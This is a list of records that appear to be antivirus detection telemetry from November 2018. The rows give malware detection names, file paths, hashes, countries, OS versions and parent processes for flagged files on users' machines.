  Row(detection=Row(filename='dwh7913.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH7913.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012047-188280f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012047-188280F1', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124700-8ecf797f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124639-7D826BC8\\AVSCAN-20181101-124700-8ECF797F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:47:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-065612-0c47283f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_501d5ee2\\AVSCAN-20181101-065548-0759CFA3\\AVSCAN-20181101-065612-0C47283F', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='664af15df40e1f9e0ad1bb4be5b607d98da5a2ac74b51741e264eb792bd504ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:56:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 02 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 02 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nse42F9.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='-r', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Total Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-01T04:10:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='рабочего стола.scr', filepath='D:\\с рабочего стола\\рабочего стола.scr', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:17:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121816-cff0c716', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121735-AC4E63E8\\AVSCAN-20181101-121816-CFF0C716', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:18:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ae039e925ab20d80d4f168649183914a', filepath='e:\\sample\\20181101_sample\\AE039E925AB20D80D4F168649183914A', filesize=40000, name='HTML/Infected.WebPage.Gen2.#M1.#R1'), hash='b27b36c0e6d0e1fbd4320bdc87447ec64241ea61875021084af148bb6837df54', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:32:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_0242910685.exe', filepath='c:\\users\\X\\downloads\\atube_catcher_0242910685.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:52:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:38:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Music\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\Kodi Video\\\\\\\\Zec Miner 0.3.4b.zip\\\\\\"', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Ashampoo\\Ashampoo ZIP 2017\\ASZIP.EXE', parentsize=34343216, timestamp='2018-11-01T20:50:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tv (1).exe', filepath='C:\\Users\\X\\Desktop\\TV (1).exe', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848952, timestamp='2018-11-01T15:18:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='enviacargaredecard.exe', filepath='C:\\Users\\X\\Desktop\\FINANCEIRO\\Pastas Diversas\\Backup SiTef\\2016-04-01-SiTef\\APLIC.WIN\\enviacargaredecard.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='e9edf33dfd617ac9a998b1dc917665dc643a5d140b17963a04f08a50b7d41ec5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:05:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='speedownloader.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\speedownloader.exe', filesize=420000, name='HEUR/AGEN.1033019.#M1.#R1'), hash='8dfceb6bfd1723f11c3a60f359f5830d94da2008bdee6f83856d19f2a92bcf82', metadata=Row(cmdline='-boot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\PremierOpinion\\pmropn.exe', parentsize=3705792, timestamp='2018-11-01T03:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105949-a63f8b99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105949-A63F8B99', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zisgy27ti.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-10-31_09-43-19\\ZISGY27TI.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T00:37:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\new_313D\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:05:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134320-194d7696', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b61edb73\\AVSCAN-20181101-134248-14DAC64B\\AVSCAN-20181101-134320-194D7696', filesize=696000, name='ADWARE/Amonetize.Gen.#M1.#R1'), hash='df264ecdbc5c8b21c86dc394ca14fc894c929b64a3bf1044ab777262d605189d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:43:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195930-161491a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2e72d94e\\AVSCAN-20181101-195843-0C18E9BF\\AVSCAN-20181101-195930-161491A8', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:59:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185830-d3038d48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40adb6ae\\AVSCAN-20181101-185821-D1632A9C\\AVSCAN-20181101-185830-D3038D48', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1a7c04877f17c2c4807a7ecda85ba5a45958827ea1ccb42fd16b44097ca796d3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\1A7C04877F17C2C4807A7ECDA85BA5A45958827EA1CCB42FD16B44097CA796D3', filesize=704000, name='HEUR/AGEN.1000007.#M1.#R1'), hash='1a7c04877f17c2c4807a7ecda85ba5a45958827ea1ccb42fd16b44097ca796d3', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:48:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:05:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='butterflyescape.exe', filepath='\\?\\J:\\العاب2\\جميع انواع الزوما\\زوما فراشة\\ButterflyEscape.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='68efe609d7e190297e18b0b0e52b8f177f35973f20ba8066d8177ee77b0a3d9e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:20:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:44:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sxucvbzzst.exe', filepath='C:\\Program Files\\Synaptics\\GESHNUPCAZ\\SXUCVBZZST.exe', filesize=320000, name='HEUR/AGEN.1028214.#M1.#R1'), hash='46bb9ee539835e8f3b412227226b3cf1c69e9180ba51f719fcc9965d41ed2d75', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1t1r\\\\\\/lF03EuOvE0E.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:19:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:38:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:02:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:06:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ultimatehwe.exe', filepath='\\\\?\\C:\\UMTool\\UltimateHwe\\UltimateHWE.exe', filesize=5696000, name='HEUR/AGEN.1017632.#M1.#R1'), hash='36ebba073148efd4ea8ae03d7eeeb218b1999939fd9aca32c40c1c10d91bdd5d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:42:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000043-47aa5e30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234829-DD2407AD\\AVSCAN-20181102-000043-47AA5E30', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:00:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-133306-06215fcb', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b58d36e\\AVSCAN-20181102-131433-69A02F5C\\AVSCAN-20181102-133306-06215FCB', filesize=448000, name='HEUR/AGEN.1018883.#M1.#R1'), hash='1203a4c2df817debacef79147ffde7270b001f9e8a07bfb6142133f0f3dedd9f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:37:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:49:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diner_dash_5-boom_collectors_edition.exe', filepath='F:\\العاب\\العاب بنات\\الطبخ\\Mazika2Day.com_ Diner Dash 5 By adam.sa21 - Copy\\Diner_Dash_5-Boom_Collectors_Edition.exe', filesize=3328000, name='W32/Ramnit.CD.#M1.#R1'), hash='456d9f3f71feb307f7c9657c5f2d23501c986da7bdaffb8f71c7eab3eb3e0008', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:29:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191418-4ef395cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191418-4EF395CC', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='413.bat', filepath='F:\\New folder\\Corel Draw 12\\413\\413.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090757-15d0c861', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224711-AF384F40\\AVSCAN-20181102-090757-15D0C861', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202154-5799fb82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b115d0a\\AVSCAN-20181101-202045-4ED90A4F\\AVSCAN-20181101-202154-5799FB82', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='#new hack ghost wolf v1.0.3[vip].exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\#New Hack Ghost Wolf V1.0.3[VIP]\\#New Hack Ghost Wolf V1.0.3[VIP].exe', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T16:38:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nssC4D9.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T04:19:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093944-c872c033', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093944-C872C033', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\apehnkswsbb\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:05:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esami settembre 2017.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ESAMI SETTEMBRE 2017\\ESAMI SETTEMBRE 2017.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rwzskoa', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RWZSKOA', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='87fb85fb2421077d090f6fc9944070bc3b9c60eb5249cff09fd7e6ce8be4fa17', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:14Z'), dt=datetime.date(2018, 11, 1)),
